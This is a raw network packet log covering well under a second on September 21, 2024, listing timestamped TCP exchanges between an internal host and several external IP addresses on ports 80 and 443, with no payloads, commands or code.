Sep 21, 2024 14:48:09.976635933 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976641893 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976649046 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976649046 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976655006 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976660013 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976665974 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976677895 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976717949 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976905107 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976917982 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976928949 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976939917 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.976943970 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976967096 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.976985931 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.977042913 CEST	80	49721	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.977175951 CEST	80	49721	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.977219105 CEST	49721	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.977219105 CEST	49721	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.977592945 CEST	49721	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.978250027 CEST	49727	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.982374907 CEST	80	49721	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.983136892 CEST	80	49727	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.983217001 CEST	49727	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.983372927 CEST	49727	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.983834028 CEST	49728	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.988375902 CEST	80	49727	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.988429070 CEST	49727	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.988703012 CEST	80	49728	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.988794088 CEST	49728	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.988940954 CEST	49728	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.989437103 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.989471912 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.989562988 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.989887953 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.989898920 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.994379044 CEST	80	49728	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.994471073 CEST	49728	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:09.996203899 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996216059 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996222019 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996268988 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996279955 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.996282101 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996344090 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.996344090 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.996396065 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996407986 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996421099 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996424913 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996445894 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.996455908 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996468067 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996479034 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996490955 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.996520042 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.996562004 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996575117 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996587038 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996597052 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996618986 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.996643066 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.996721029 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996733904 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996747017 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996759892 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.996761084 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996776104 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996781111 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.996789932 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996803045 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996814013 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.996834993 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.996862888 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.996869087 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996911049 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.996934891 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996952057 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.996984005 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.996998072 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997030020 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997041941 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997052908 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997065067 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997067928 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997077942 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997092009 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997136116 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997164965 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997179031 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997209072 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997231007 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997231007 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997246027 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997258902 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997270107 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997291088 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997312069 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997411966 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997425079 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997437000 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997448921 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997450113 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997462988 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997472048 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997478962 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997488022 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997520924 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997526884 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997539997 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997550011 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997565985 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997601032 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997670889 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997684002 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997695923 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997706890 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997720957 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997733116 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997745991 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997759104 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997781038 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.997972965 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997986078 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.997997999 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998008966 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998017073 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998020887 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998034000 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998042107 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998048067 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998059988 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998073101 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998074055 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998085022 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998091936 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998100042 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998111963 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998142004 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998286009 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998298883 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998310089 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998323917 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998332024 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998337030 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998348951 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998377085 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998410940 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998425007 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998435974 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998449087 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998482943 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998610020 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998621941 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998634100 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998645067 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998653889 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998657942 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998666048 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998672962 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998684883 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998697042 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998697996 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998711109 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998724937 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998728037 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998756886 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998774052 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998894930 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998908043 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998920918 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998933077 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998934984 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998945951 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998951912 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.998960018 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.998980999 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.999048948 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.021218061 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.021230936 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.021243095 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.021277905 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.021308899 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.021318913 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.021332026 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.021346092 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.021358013 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.021358967 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.021395922 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.023720980 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.023732901 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.023746967 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.023780107 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.023798943 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.023808956 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.023813963 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.023827076 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.023837090 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.023842096 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.023859978 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.023871899 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.023871899 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.023902893 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.023910046 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.023921013 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.023931026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.023932934 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.023958921 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.023986101 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024003983 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024014950 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024024963 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024039030 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024050951 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024056911 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024060965 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024070978 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024074078 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024085999 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024090052 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024118900 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024128914 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024132967 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024146080 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024153948 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024173021 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024200916 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024213076 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024233103 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024245024 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024255991 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024277925 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024290085 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024313927 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024324894 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024339914 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024349928 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024374962 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024388075 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024388075 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024394035 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024405956 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024418116 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024425030 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024436951 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024447918 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024450064 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024458885 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024482965 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024502993 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024544954 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024555922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024566889 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024579048 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024585962 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024590969 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024595976 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024610043 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024653912 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024686098 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024697065 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024718046 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024728060 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024729967 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024744034 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024755955 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024760962 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024789095 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024919033 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024930954 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024940968 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024952888 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024964094 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.024965048 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.024977922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.025000095 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.025029898 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.025089979 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.025101900 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.025113106 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.025125027 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.025130033 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.025136948 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.025150061 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.025161028 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.025161028 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.025172949 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.025187016 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.025192022 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.025207996 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.025233030 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.025264978 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.025278091 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.025296926 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.025310040 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.025310993 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.025324106 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.025336981 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.025336981 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.025369883 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.025402069 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.025408030 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.025418043 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.025429964 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.025444984 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.025475025 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.025511026 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.025522947 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.025532961 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.025543928 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.025556087 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.025566101 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.025568008 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.025579929 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.025582075 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.025590897 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.025593042 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.025619030 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.025635958 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.025655031 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.025665998 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.025684118 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.025695086 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.025707006 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.025711060 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.025722027 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.025757074 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.025857925 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.025871038 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.025881052 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.025893927 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.025899887 CEST	80	49709	147.45.44.104	192.168.2.9
